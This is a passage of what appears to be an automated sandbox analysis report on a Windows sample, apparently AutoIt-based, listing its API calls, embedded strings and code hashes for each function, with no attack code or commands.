                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$Foreground
                                    • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                    • API String ID: 62970417-1919597938
                                    • Opcode ID: f3e8d2026210d10540b91755556e12f3dfc899920839c78f0e7e9839d7ba7013
                                    • Instruction ID: 13b940f9405b37b708a876ca11645d4c838bf6994b42116efedd5da0a24067f1
                                    • Opcode Fuzzy Hash: f3e8d2026210d10540b91755556e12f3dfc899920839c78f0e7e9839d7ba7013
                                    • Instruction Fuzzy Hash: E7D1E93050874A9BCB04EF64C481BBAFBB4BF94344F104D1DF596572A1DB70E99ACB91
                                    APIs
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009E3735
                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00A1DC00,00000000,?,00000000,?,?), ref: 009E37A3
                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 009E37EB
                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 009E3874
                                    • RegCloseKey.ADVAPI32(?), ref: 009E3B94
                                    • RegCloseKey.ADVAPI32(00000000), ref: 009E3BA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Close$ConnectCreateRegistryValue
                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                    • API String ID: 536824911-966354055
                                    • Opcode ID: 35b556efe40391521ec300d851f40fc14995bb32aac3b762b93ceb4d9ae4ba01
                                    • Instruction ID: a74a01645ad5fc439addcb9b2409b3b47d7d460a42b7234f350d1f3aee2c5d81
                                    • Opcode Fuzzy Hash: 35b556efe40391521ec300d851f40fc14995bb32aac3b762b93ceb4d9ae4ba01
                                    • Instruction Fuzzy Hash: EB025C75604601AFCB15EF25C855B2AB7E9FF88720F04895DF98A9B3A1DB30ED01CB81
                                    APIs
                                    • CharUpperBuffW.USER32(?,?), ref: 009E6C56
                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 009E6D16
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: BuffCharMessageSendUpper
                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                    • API String ID: 3974292440-719923060
                                    • Opcode ID: ed003bdfd12ee19a5f188212cbd6e681eb54bf0a2ccdd521dc60f74ac95e3a84
                                    • Instruction ID: d973d500831b5122c3fc3b6826206b6d848c6801b72f08e223082276e6dfc83a
                                    • Opcode Fuzzy Hash: ed003bdfd12ee19a5f188212cbd6e681eb54bf0a2ccdd521dc60f74ac95e3a84
                                    • Instruction Fuzzy Hash: A2A16C302043819BCB15EF25C951B7AB7A5BF94354F144D6DB8A69B3D2EB30ED06CB81
                                    APIs
                                    • GetClassNameW.USER32(?,?,00000100), ref: 009BCF91
                                    • __swprintf.LIBCMT ref: 009BD032
                                    • _wcscmp.LIBCMT ref: 009BD045
                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 009BD09A
                                    • _wcscmp.LIBCMT ref: 009BD0D6
                                    • GetClassNameW.USER32(?,?,00000400), ref: 009BD10D
                                    • GetDlgCtrlID.USER32(?), ref: 009BD15F
                                    • GetWindowRect.USER32(?,?), ref: 009BD195
                                    • GetParent.USER32(?), ref: 009BD1B3
                                    • ScreenToClient.USER32(00000000), ref: 009BD1BA
                                    • GetClassNameW.USER32(?,?,00000100), ref: 009BD234
                                    • _wcscmp.LIBCMT ref: 009BD248
                                    • GetWindowTextW.USER32(?,?,00000400), ref: 009BD26E
                                    • _wcscmp.LIBCMT ref: 009BD282
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                    • String ID: %s%u
                                    • API String ID: 3119225716-679674701
                                    • Opcode ID: c9b520f1eb9b94b3279773095465551a340d1a66c51bddb7f6d4bcd2dc13ac92
                                    • Instruction ID: 080c628afe86bf42916cd2429681baa3f7fe728cfa1fbfe779269da2b640fd02
                                    • Opcode Fuzzy Hash: c9b520f1eb9b94b3279773095465551a340d1a66c51bddb7f6d4bcd2dc13ac92
                                    • Instruction Fuzzy Hash: A0A1D271609746AFD714DF64C984FEAB7ACFF44324F008529F9A9D2180EB30EA46CB91
                                    APIs
                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 009BD8EB
                                    • _wcscmp.LIBCMT ref: 009BD8FC
                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 009BD924
                                    • CharUpperBuffW.USER32(?,00000000), ref: 009BD941
                                    • _wcscmp.LIBCMT ref: 009BD95F
                                    • _wcsstr.LIBCMT ref: 009BD970
                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 009BD9A8
                                    • _wcscmp.LIBCMT ref: 009BD9B8
                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 009BD9DF
                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 009BDA28
                                    • _wcscmp.LIBCMT ref: 009BDA38
                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 009BDA60
                                    • GetWindowRect.USER32(00000004,?), ref: 009BDAC9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                    • String ID: @$ThumbnailClass
                                    • API String ID: 1788623398-1539354611
                                    • Opcode ID: a51be4e14e13e303e8f09f4c94aadac2487fedf5a938f292345c7a8190398021
                                    • Instruction ID: be29b361940a160bb5f5bbfe7a42c6810616dc1783eae9165f1611569806acd6
                                    • Opcode Fuzzy Hash: a51be4e14e13e303e8f09f4c94aadac2487fedf5a938f292345c7a8190398021
                                    • Instruction Fuzzy Hash: B681A1710093059BDB05DF50CA85FAA7BECFF84724F04846AFD899A096EB34DD46CBA1
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __wcsnicmp
                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                    • API String ID: 1038674560-1810252412
                                    • Opcode ID: c24cb4247e88384c7ede4af03dd296ca96d0abd453927c2f01b836033459851a
                                    • Instruction ID: 580fdd453cc67fb99e770f8fd61c9e3e7cef68d88c0b239b1cbeedbe2635f154
                                    • Opcode Fuzzy Hash: c24cb4247e88384c7ede4af03dd296ca96d0abd453927c2f01b836033459851a
                                    • Instruction Fuzzy Hash: 80316C71644205BADB14FE60DE93FEDB7B8AFA1721F200929F441B51D1FF61AA04C791
                                    APIs
                                    • LoadIconW.USER32(00000063), ref: 009BEAB0
                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 009BEAC2
                                    • SetWindowTextW.USER32(?,?), ref: 009BEAD9
                                    • GetDlgItem.USER32(?,000003EA), ref: 009BEAEE
                                    • SetWindowTextW.USER32(00000000,?), ref: 009BEAF4
                                    • GetDlgItem.USER32(?,000003E9), ref: 009BEB04
                                    • SetWindowTextW.USER32(00000000,?), ref: 009BEB0A
                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 009BEB2B
                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 009BEB45
                                    • GetWindowRect.USER32(?,?), ref: 009BEB4E
                                    • SetWindowTextW.USER32(?,?), ref: 009BEBB9
                                    • GetDesktopWindow.USER32 ref: 009BEBBF
                                    • GetWindowRect.USER32(00000000), ref: 009BEBC6
                                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 009BEC12
                                    • GetClientRect.USER32(?,?), ref: 009BEC1F
                                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 009BEC44
                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 009BEC6F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                    • String ID:
                                    • API String ID: 3869813825-0
                                    • Opcode ID: b23f5cdfa844fcb9cf98eaa6324afe64d12303e5efe778672af2e2290eb41621
                                    • Instruction ID: f9887f3b7c5d3919123212fbbe7eb56e5e6a81dccf74d890c97571a7bd8d9e25
                                    • Opcode Fuzzy Hash: b23f5cdfa844fcb9cf98eaa6324afe64d12303e5efe778672af2e2290eb41621
                                    • Instruction Fuzzy Hash: A4515E71900709EFDB20DFA9CE89FAEBBF9FF04714F004928E586A25A0C775A945CB10
                                    APIs
                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 009D79C6
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 009D79D1
                                    • LoadCursorW.USER32(00000000,00007F03), ref: 009D79DC
                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 009D79E7
                                    • LoadCursorW.USER32(00000000,00007F01), ref: 009D79F2
                                    • LoadCursorW.USER32(00000000,00007F81), ref: 009D79FD
                                    • LoadCursorW.USER32(00000000,00007F88), ref: 009D7A08
                                    • LoadCursorW.USER32(00000000,00007F80), ref: 009D7A13
                                    • LoadCursorW.USER32(00000000,00007F86), ref: 009D7A1E
                                    • LoadCursorW.USER32(00000000,00007F83), ref: 009D7A29
                                    • LoadCursorW.USER32(00000000,00007F85), ref: 009D7A34
                                    • LoadCursorW.USER32(00000000,00007F82), ref: 009D7A3F
                                    • LoadCursorW.USER32(00000000,00007F84), ref: 009D7A4A
                                    • LoadCursorW.USER32(00000000,00007F04), ref: 009D7A55
                                    • LoadCursorW.USER32(00000000,00007F02), ref: 009D7A60
                                    • LoadCursorW.USER32(00000000,00007F89), ref: 009D7A6B
                                    • GetCursorInfo.USER32(?), ref: 009D7A7B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Cursor$Load$Info
                                    • String ID:
                                    • API String ID: 2577412497-0
                                    • Opcode ID: b1bb5e320a1688370740c3d0698ff15607d4d30e6c363001a6107d813398663e
                                    • Instruction ID: 4889320b8dae02412392c64887128148b6a97664290678dc9a5f216c074e3d4a
                                    • Opcode Fuzzy Hash: b1bb5e320a1688370740c3d0698ff15607d4d30e6c363001a6107d813398663e
                                    • Instruction Fuzzy Hash: BC31E1B1D4831A6ADB109FF68C8995FFEECFB04750F50452BA50DA7280EA78A5018FA1
                                    APIs
                                      • Part of subcall function 0099E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0098C8B7,?,00002000,?,?,00000000,?,0098419E,?,?,?,00A1DC00), ref: 0099E984
                                      • Part of subcall function 0098660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009853B1,?,?,009861FF,?,00000000,00000001,00000000), ref: 0098662F
                                    • __wsplitpath.LIBCMT ref: 0098C93E
                                      • Part of subcall function 009A1DFC: __wsplitpath_helper.LIBCMT ref: 009A1E3C
                                    • _wcscpy.LIBCMT ref: 0098C953
                                    • _wcscat.LIBCMT ref: 0098C968
                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0098C978
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0098CABE
                                      • Part of subcall function 0098B337: _wcscpy.LIBCMT ref: 0098B36F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                    • API String ID: 2258743419-1018226102
                                    • Opcode ID: 1e18d631169abec49290b9dfe2ffb72e93baa39c8eeb3479deed1f643d9f1c1b
                                    • Instruction ID: f8ce61fd829ff1015653d856b32fa9d4fe141fc0acbcfe0576f5f9265350bcd0
                                    • Opcode Fuzzy Hash: 1e18d631169abec49290b9dfe2ffb72e93baa39c8eeb3479deed1f643d9f1c1b
                                    • Instruction Fuzzy Hash: 99129C715083459FC724EF24C881AAFBBE8BFD9314F44491EF589932A1DB34DA49CB62
                                    APIs
                                    • _memset.LIBCMT ref: 009ECEFB
                                    • DestroyWindow.USER32(?,?), ref: 009ECF73
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 009ECFF4
                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 009ED016
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009ED025
                                    • DestroyWindow.USER32(?), ref: 009ED042
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00980000,00000000), ref: 009ED075
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009ED094
                                    • GetDesktopWindow.USER32 ref: 009ED0A9
                                    • GetWindowRect.USER32(00000000), ref: 009ED0B0
                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 009ED0C2
                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 009ED0DA
                                      • Part of subcall function 0099B526: GetWindowLongW.USER32(?,000000EB), ref: 0099B537
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                    • String ID: 0$tooltips_class32
                                    • API String ID: 3877571568-3619404913
                                    • Opcode ID: ba3fd41ce76cab516ac1f5023991db593f0b48914743c83c8e1a905406a9446f
                                    • Instruction ID: 1df9e29ff17ce9fa30023324b652653118b1b0c5984b2613c54eee68d855cc4c
                                    • Opcode Fuzzy Hash: ba3fd41ce76cab516ac1f5023991db593f0b48914743c83c8e1a905406a9446f
                                    • Instruction Fuzzy Hash: 1171CAB9140345AFDB21CF68CC84F6A7BE9EB89704F08491DF985872A1D735EC42CB22
                                    APIs
                                    • VariantInit.OLEAUT32(00000000), ref: 009CAB3D
                                    • VariantCopy.OLEAUT32(?,?), ref: 009CAB46
                                    • VariantClear.OLEAUT32(?), ref: 009CAB52
                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 009CAC40
                                    • __swprintf.LIBCMT ref: 009CAC70
                                    • VarR8FromDec.OLEAUT32(?,?), ref: 009CAC9C
                                    • VariantInit.OLEAUT32(?), ref: 009CAD4D
                                    • SysFreeString.OLEAUT32(00000016), ref: 009CADDF
                                    • VariantClear.OLEAUT32(?), ref: 009CAE35
                                    • VariantClear.OLEAUT32(?), ref: 009CAE44
                                    • VariantInit.OLEAUT32(00000000), ref: 009CAE80
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                    • API String ID: 3730832054-3931177956
                                    APIs
                                    • CharUpperBuffW.USER32(?,?), ref: 009E71FC
                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009E7247
                                    Strings
                                    Similarity
                                    • API ID: BuffCharMessageSendUpper
                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                    • API String ID: 3974292440-4258414348
                                    APIs
                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 009EE5AB
                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,009EBEAF), ref: 009EE607
                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 009EE647
                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 009EE68C
                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 009EE6C3
                                    • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,009EBEAF), ref: 009EE6CF
                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 009EE6DF
                                    • DestroyCursor.USER32(?), ref: 009EE6EE
                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 009EE70B
                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 009EE717
                                      • Part of subcall function 009A0FA7: __wcsicmp_l.LIBCMT ref: 009A1030
                                    Strings
                                    Similarity
                                    • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                    • String ID: .dll$.exe$.icl
                                    • API String ID: 3907162815-1154884017
                                    APIs
                                      • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                      • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                    • CharLowerBuffW.USER32(?,?), ref: 009CD292
                                    • GetDriveTypeW.KERNEL32 ref: 009CD2DF
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009CD327
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009CD35E
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009CD38C
                                    Strings
                                    Similarity
                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                    • API String ID: 1148790751-4113822522
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,009F3973,00000016,0000138C,00000016,?,00000016,00A1DDB4,00000000,?), ref: 009C26F1
                                    • LoadStringW.USER32(00000000,?,009F3973,00000016), ref: 009C26FA
                                    • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,009F3973,00000016,0000138C,00000016,?,00000016,00A1DDB4,00000000,?,00000016), ref: 009C271C
                                    • LoadStringW.USER32(00000000,?,009F3973,00000016), ref: 009C271F
                                    • __swprintf.LIBCMT ref: 009C276F
                                    • __swprintf.LIBCMT ref: 009C2780
                                    • _wprintf.LIBCMT ref: 009C2829
                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 009C2840
                                    Strings
                                    Similarity
                                    • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                    • API String ID: 618562835-2268648507
                                    APIs
                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 009CD0D8
                                    • __swprintf.LIBCMT ref: 009CD0FA
                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 009CD137
                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 009CD15C
                                    • _memset.LIBCMT ref: 009CD17B
                                    • _wcsncpy.LIBCMT ref: 009CD1B7
                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 009CD1EC
                                    • CloseHandle.KERNEL32(00000000), ref: 009CD1F7
                                    • RemoveDirectoryW.KERNEL32(?), ref: 009CD200
                                    • CloseHandle.KERNEL32(00000000), ref: 009CD20A
                                    Strings
                                    Similarity
                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                    • String ID: :$\$\??\%s
                                    • API String ID: 2733774712-3457252023
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,009EBEF4,?,?), ref: 009EE754
                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,009EBEF4,?,?,00000000,?), ref: 009EE76B
                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,009EBEF4,?,?,00000000,?), ref: 009EE776
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,009EBEF4,?,?,00000000,?), ref: 009EE783
                                    • GlobalLock.KERNEL32(00000000), ref: 009EE78C
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,009EBEF4,?,?,00000000,?), ref: 009EE79B
                                    • GlobalUnlock.KERNEL32(00000000), ref: 009EE7A4
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,009EBEF4,?,?,00000000,?), ref: 009EE7AB
                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,009EBEF4,?,?,00000000,?), ref: 009EE7BC
                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00A0D9BC,?), ref: 009EE7D5
                                    • GlobalFree.KERNEL32(00000000), ref: 009EE7E5
                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 009EE809
                                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 009EE834
                                    • DeleteObject.GDI32(00000000), ref: 009EE85C
                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 009EE872
                                    Similarity
                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                    • String ID:
                                    • API String ID: 3840717409-0
                                    APIs
                                    • __wsplitpath.LIBCMT ref: 009D076F
                                    • _wcscat.LIBCMT ref: 009D0787
                                    • _wcscat.LIBCMT ref: 009D0799
                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009D07AE
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 009D07C2
                                    • GetFileAttributesW.KERNEL32(?), ref: 009D07DA
                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 009D07F4
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 009D0806
                                    Strings
                                    Similarity
                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                    • String ID: *.*
                                    • API String ID: 34673085-438819550
                                    APIs
                                      • Part of subcall function 009BABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 009BABD7
